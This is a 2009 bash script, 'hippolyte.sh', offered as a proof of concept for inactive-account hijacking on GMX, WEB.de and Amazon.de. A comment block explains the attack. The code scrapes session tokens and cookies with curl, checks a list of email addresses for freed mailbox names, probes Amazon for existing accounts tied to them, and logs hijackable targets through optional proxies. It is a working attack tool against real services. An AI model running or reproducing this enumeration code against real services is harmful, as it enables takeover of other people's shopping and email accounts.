#!/bin/bash # hippolyte.sh - l0om ############## # hippolyte has been written to be something like a proof-of-concept code for # automate inactive-account-hijacking attack. # in this special case we take care about Amazon and two common email serivce # provider in germany: GMX and WEB. # this program can refer to the following mail at securityfocus # http://www.securityfocus.com/archive/1/503175 ############## # INACTIVE ACCOUNT HIJACKING # #author: l0om #page: l0om.org #date: 29.04.2009 # # #OVERVIEW: # #I would like to draw your attention on a problem that is already known and is surely exploited for a long time, but clearly seems to be underestimated. # #the problem is explained quickly: #- email service provider delete inactive accounts after six or twelve months of inactivity and release the adresse (eg GMX, WEB) #- many platforms such as amazon do NOT delete inactive accounts # #This asymmetry in handling inactive accounts has the consequence that thousands of accounts of various online platforms, like Amazon or eBay, can be hijacked by attackers without any technical difficulties. # #The procedure is so simple that it dont needs to be mentioned: #- An attacker takes an old email address and try to register this email account at the email service provider. #- If it can be registered, it is assumed that the account has been released (or has never existed). #- Then the attacker tries at a variety of online platforms to create accounts for the just mentioned email address. #- If the registration would be successful, there is no account for this email address at this online platform registered #+ If the registration fails, because it already have an account there, there has been found a registered account for this email address and now its getting ugly. # #an attacker can hijack the account of the online platform if he simply register the email account and now uses the forgotten-the-password-function. the attacker gets a link which can be used to set a new password. Now he has the user data and the functions of the original owner in his control. sure, some platforms e.g. ebay wont sent you the password reset link 4 free like amazon. on ebay you first have to enter some information about your person like address or your birthday. the problem is that the requested information expect answers which may be found on the internet - just think about social networks in the internet like MySpace. with use of google and the victims email address the attacker may look up such information quick. finally some "usefull" aspects of sites like 123people.com.... # #jeopardized are all possible online systems with such a forgotten-password-function in use. # #furthermore on holidays an attacker gets newsletter emails which lead the attacker to another accounts. # # #AUTOMATIC: # #badass@evilhost:~$ ./hippolyte.sh -h # # Hippolyte # Your Amazons are mine... # written by l0om (who likes to have amazons too) # # hippolyte.sh < -f email-file [options] > # options: # -f: next argument the file with emails (seperated with \n) # -l: next argument the logfiles name # -v: verbose # -p: next argument the full proxy (eg. "localhost:4001") # #badass@evilhost:~$ ./hippolyte.sh -f accounts -l output # # Hippolyte # Your Amazons are mine... # written by l0om (who likes to have amazons too) # #get vaild gmx sid...done #get amazon cookies...done #---------- come get my belt ---------- #check account censored-01@gmx.de at gmx.de #check account censored-02@gmx.de at gmx.de # GMX account censored-02@gmx.de is free to register # checking censored-02@gmx.de at amazon... # +++ possible account hijacking for censored-02@gmx.de at amazon.de #check account censored-03@gmx.de at gmx.de # GMX account censored-03@gmx.de is free to register # checking censored-03@gmx.de at amazon... # +++ possible account hijacking for censored-03@gmx.de at amazon.de #check account censored-04@gmx.de at gmx.de # GMX account censored-04@gmx.de is free to register # checking censored-04@gmx.de at amazon... # +++ possible account hijacking censored-04@gmx.de at amazon.de #check account censored-05@gmx.de at gmx.de #[...] ## END OF NOTES ## # PARAMETERS: # first: cookie filename # second: full proxy (HTTPS) # RETURN VALUES: # none for now. writes cookies to filename function get_web_cookie() { if test -z $2 then curl -k "https://user.web.de/all.jsf" -c $1 1>/dev/null 2>/dev/null else curl -k -x $2 "https://user.web.de/all.jsf" -c $1 1>/dev/null 2>/dev/null fi } # PARAMETERS: # first: full proxy string like "127.0.0.1:4001" # RETURN VALUES: # returns new sid string function get_gmx_sid() { if test -z $1 then curl https://service.gmx.net/de/cgi/g.fcgi/tariff/new/freemail/instant/user -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null else curl -x $1 https://service.gmx.net/de/cgi/g.fcgi/tariff/new/freemail/instant/user -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null fi grep https test | awk -F'sid=' '{print $2}' | cut -f1 -d\" } #function checks the gmx account for beeing registrated or not # PARAMETERS: # first: GMX sid # second: url encoded email addy (no @domain.td) # third: email addy (no @domain.td) # fourth: full proxy # fifth: top level domain (eg. de, org, etc...) # RETURN VALUES: # 0 for NOT FREE account # 1 for FREE account # NOTE: here is no state "2" for unexpected behavoir returnd! this is kinda lame and should be fixed. function check_gmx_account() { if test -z $4 then curl -k "https://service.gmx.net/de/cgi/g.fcgi/misc/purifier/tariff/new/common/suggestaddress?sid=$1&wishname=$2&countryiso=$5" -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null else curl -x $4 -k "https://service.gmx.net/de/cgi/g.fcgi/misc/purifier/tariff/new/common/suggestaddress?sid=$1&wishname=$2&countryiso=$5" -A 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6' 1>test 2>/dev/null fi #cat test >debug res=`grep $3@gmx.$5 test | wc -l` #echo $res >>debug if test $res -eq 0 then echo 0 else echo 1 fi } # PARAMETERS: # first: email-addy (no @domain.tld) # second: cookiefile # third: full proxy (HTTPS) # RETURN VALUES: # 0 for NOT FREE account # 1 for FREE account # 2 unexpected result (eg. WEB blocks the JAP proxy...) function check_web_account() { if test -z $3 then curl -k -b $2 "https://user.web.de/all.jsf" -d "step1%3Aprename=&step1%3Aname=&step1%3AstreetNo=&step1%3Aplz=&step1%3Acity=&step1%3Acountry=1&step1%3AdateOfBirth.day=&step1%3AdateOfBirth.month=&step1%3AdateOfBirth.year=&step1%3Ausername=$1&step1%3Aavailable=Verf%C3%BCgbarkeit+pr%C3%BCfen&step1%3Apasswd=&step1%3Apasswd2=&step1%3Achallenges=1&step1%3AsecAnswer=&step1%3Aemail=&step1%3Amobil=&step1%3AcaptchaAnswer=&step1_SUBMIT=1&step1%3A_link_hidden_=" 1>webtest 2>/dev/null else curl -k -b $2 -x $3 "https://user.web.de/all.jsf" -d "step1%3Aprename=&step1%3Aname=&step1%3AstreetNo=&step1%3Aplz=&step1%3Acity=&step1%3Acountry=1&step1%3AdateOfBirth.day=&step1%3AdateOfBirth.month=&step1%3AdateOfBirth.year=&step1%3Ausername=$1&step1%3Aavailable=Verf%C3%BCgbarkeit+pr%C3%BCfen&step1%3Apasswd=&step1%3Apasswd2=&step1%3Achallenges=1&step1%3AsecAnswer=&step1%3Aemail=&step1%3Amobil=&step1%3AcaptchaAnswer=&step1_SUBMIT=1&step1%3A_link_hidden_=" 1>webtest 2>/dev/null fi free=`grep "ist verfügbar." webtest | wc -l` if test $free -eq 1 then echo 1 exit; fi notfree=`grep "ist leider schon vergeben" webtest | wc -l` if test $notfree -eq 1 then echo 0 exit; fi echo 2 #unexpected... time to debug } #function returns nothing but saves needed cookies in cookies.txt #parameters: full proxy string like "127.0.0.1:4001" function get_amazon_cookies() { if test -z $1 then curl -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' 1>/dev/null 2>/dev/null curl -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -b cookies.txt 1>/dev/null 2>/dev/null else curl -x $1 -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' 1>/dev/null 2>/dev/null curl -x $1 -c cookies.txt http://www.amazon.de -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -b cookies.txt 1>/dev/null 2>/dev/null fi } # return urlencoded parameter one # parameters: string to encode function my_urlencode() { echo -n $1 | od -t x1 -A n | tr " " % | tr '\n' " " | tr -d ' ' } #function checks amazon.de for an existing account identified with email address XY #parameters: # first: url encoded email addy (full) # second: full proxy #returns 1 on a registered account and 0 for a FREE account function check_amazon_account() { email=`my_urlencode $1` post="__mk_de_DE=%C5M%C5Z%D5%D1&path=%2Fgp%2Fyourstore&useRedirectOnSuccess=1&query=signIn%3D1%26ref_%3Dpd_irl_gw&mode=&redirectProtocol=&pageAction=%2Fgp%2Fyourstore&disableCorpSignUp=&protocol=https&sessionId=276-7336171-5053721&referer=flex&email=$email&action=new-user&password=&x=137&y=7&metadata1=Firefox+3.0.4+Windows&metadataf1=&metadata2=Foxit+Reader+Plugin+for+Mozilla+Mozilla+Default+Plug-in+DivX+Web+Player+1427Adobe+Acrobat+QuickTime+Plug-in+7.5.5+NPMPDRM+License+Acquisition+Plugin+WMMPDRM+License+Acquisition+Wrapper+Active+Process+Information+eXchange+fluxDVD+Shockwave+Flash+90124iTunes+Application+Detector+DivX%AE+Content+Upload+Plugin+NPVeohVersion4+plugin+4VLC+Multimedia+Plugin+08619962007Java%28TM%29+Platform+SE+6+U7+16007%7C%7C1280-1024-996-32-*-*-*&metadata3=timezone%3A+-1+execution+time%3A+4" if test -z $2 then curl https://www.amazon.de/gp/flex/sign-in/select.html -d $post -b cookies.txt -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -k >test 2>/dev/null else curl -x $2 https://www.amazon.de/gp/flex/sign-in/select.html -d $post -b cookies.txt -A 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4' -k >test 2>/dev/null fi ret=`grep "Es existiert allerdings" test | wc -l` if test $ret -eq 0 then echo 0 else echo 1 fi } function usage() { echo " hippolyte.sh < -f email-file [options] >" echo " options:" echo " -f: next argument the file with emails (seperated with \n)" echo " -l: next argument the logfiles name" echo " -v: verbose" echo " -p: next argument the full proxy (eg. \"localhost:4001\")" echo " -a: ring on possible account hijack" } toLower() { echo $1 | tr "[:upper:]" "[:lower:]" } ######################### ######### Main ########## ######################### #verbose=1 #proxy="localhost:4001" printf "\n\tHippolyte\n" printf "\tYour Amazons are mine...\n" printf "\t\twritten by l0om (who likes to have amazons too)\n\n" while [ "$1" != "" ]; do case $1 in -f | --file ) shift emailfile=$1 ;; -v | --verbose ) verbose=1 ;; -a | --alert ) alert=1 ;; -p | --proxy ) shift proxy=$1 ;; -l | --log ) shift logfile=$1 date >$logfile echo "" >>$logfile ;; -h | --help ) usage exit ;; * ) usage exit 1 esac shift done if test -z $emailfile then echo THERE IS NO EMAIL FILE usage exit fi if test `grep -i '@web.' $emailfile | wc -l` -gt 0; then echo -n get vaild WEB cookie... get_web_cookie "webcookie.txt" $proxy echo done fi if test `grep -i '@gmx.' $emailfile | wc -l` -gt 0; then echo -n get vaild gmx sid... gmxsid=`get_gmx_sid $proxy` echo done fi echo -n get amazon cookies... get_amazon_cookies $proxy echo done if [ ! -z $verbose ] then if [ ! -z $gmxsid ] then echo GMX sid is $gmxsid fi if [ -f "webcookie.txt" ] then echo WEB cookies cat webcookies.txt fi echo AMAZON cookies cat cookies.txt fi echo "---------- come get my belt ----------" for i in `cat $emailfile`; do i=`toLower $i` case $i in *@gmx.*) echo check account $i at gmx.de email=`echo $i | cut -f1 -d@` email_encoded=`my_urlencode $email` email_toplevel=`echo $i | awk -F"@gmx." '{print $2}'` let "j=j+1" if test $j -eq 5 #every fifth try get new SID then j=1 echo -n get vaild gmx sid... gmxsid=`get_gmx_sid $proxy` echo done if [ ! -z $verbose ] then echo GMX sid is $gmxsid fi fi account=`check_gmx_account $gmxsid $email_encoded $email $proxy $email_toplevel` ;; #gmx account is 0 for NOT FREE # is 1 for FREE *@web.*) echo "check account $i at web.de... " email=`echo $i | cut -f1 -d@` account=`check_web_account $email "webcookie.txt" $proxy` #check for blocked ip... if test $account -eq 2; then if test `grep '/reject_ip/' webtest | wc -l` -gt 0; then echo " WEB has blocked your ip" if [ ! -z $logfile ] then echo " WEB has blocked your ip" >>$logfile fi fi fi ;; #web account is 0 for NOT FREE # is 1 for FREE # is 2 for unexpected behavoir [*]) echo "i dont know how to handle the email serivce provider of $i" ;; esac if test $account -eq 2 #ACCOUNT STATE = 2 -> unexpected then echo " WARNING: unexpected behavoir - loop" continue fi #echo $email if test $account -eq 1 #ACCOUNT STATE = 1 -> FREE then echo " account $i is free to register" if [ ! -z $logfile ] then echo "account $i is free to register" >>$logfile fi echo " checking $i at amazon..." if test `check_amazon_account $i $proxy` -eq 1 then echo " +++ possible account hijacking for $i at amazon.de" if [ ! -a $alert ] then echo -e '\a' fi if [ ! -z $logfile ] then echo "possible account hijacking for $i at amazon.de" >>$logfile fi else echo " no amazon account registerd for $i" fi else #ACCOUNT STATE = 0 -> NOT FREE echo " account is not free" fi done rm -f webtest rm -f cookies.txt rm -f "webcookie.txt"